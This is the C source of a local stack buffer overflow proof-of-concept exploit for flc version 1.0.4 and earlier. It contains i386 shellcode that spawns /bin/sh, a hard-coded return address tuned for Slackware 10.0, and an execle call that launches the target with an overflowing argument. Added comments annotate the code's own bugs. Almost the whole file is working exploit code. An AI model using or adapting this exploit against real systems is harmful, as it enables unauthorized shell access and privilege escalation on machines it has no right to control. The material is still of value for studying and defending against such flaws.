flc <= 1.0.4 local stack buffer overflow exploit
/* flc <= 1.0.4 local stack buffer overflow exploit
(Proof of Concept)
Tested in Slackware 10.0
by CoKi <coki@nosystem.com.ar>
No System Group - http://www.nosystem.com.ar
*/
#include <stdio.h>
#include <strings.h>
/* Byte size of the argument buffer built in main(). The expansion is not
 * parenthesized, so it reads literally as "25632 + 1" at each use site. */
#define BUFFER 25632 + 1
/* Payload bytes. main() passes this array as the target's only environment
 * entry (see the env[] initializer there); each inline comment names the
 * i386 instruction the bytes encode. */
char shellcode[]=
"\x31\xc0" /* xor %eax,%eax */
"\x31\xd2" /* xor %edx,%edx */
"\x52" /* push %edx */
"\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x52" /* push %edx */
"\x53" /* push %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\xb0\x0b" /* mov $0xb,%al */
"\xcd\x80"; /* int $0x80 */
/* Entry point of the proof of concept. Takes the path of the target binary as
 * argv[1], fills a large buffer with one repeated 32-bit value and executes the
 * target with that buffer as its single argument and `shellcode` as its whole
 * environment. Only <stdio.h> and <strings.h> are included, so exit(),
 * strlen() and execle() are called without prototypes here (ISO C declares
 * strlen in <string.h>, exit in <stdlib.h>; execle is POSIX <unistd.h>). */
int main(int argc, char *argv[]) {
/* Two of three slots initialized: {shellcode, NULL, NULL}; the target sees a
 * one-entry environment. */
char *env[3] = {shellcode, NULL};
char buf[BUFFER], *path;
/* Reinterprets the char array as int storage so it can be filled one word at
 * a time. A char array carries no alignment guarantee for int access, and
 * writing through the cast is a strict-aliasing violation in ISO C. */
int *buffer = (int *) (buf);
int i, ret;
if(argc != 2) {
printf(" use: %s <path>\n", argv[0]);
exit(0);
}
path = argv[1];
/* Hard-coded address arithmetic: strlen() returns size_t, so this evaluates
 * unsigned and is then narrowed to int (implementation-defined when out of
 * range). The fixed 0xbffffffa base ties the PoC to one stack layout; the file
 * header says it was tested on Slackware 10.0 only. */
ret = 0xbffffffa - strlen(shellcode) - strlen(path);
/* Loop bound is inclusive: with BUFFER = 25632 + 1, i reaches 25632, so the
 * final 4-byte store covers buf[25632..25635] while buf ends at buf[25632].
 * Nothing here NUL-terminates buf before it is passed as a C string either. */
for(i=0; i<=BUFFER; i+=4)
*buffer++ = ret;
printf("\n flc <= 1.0.4 local stack buffer overflow (Proof of Concept)\n");
printf(" by CoKi <coki@nosystem.com.ar>\n\n");
/* argv for the target is {"flc", buf}; envp is env. On success execle() does
 * not return; its failure return value is not checked, and main then falls
 * off the end without a return statement. */
execle(path, "flc", buf, NULL, env);
}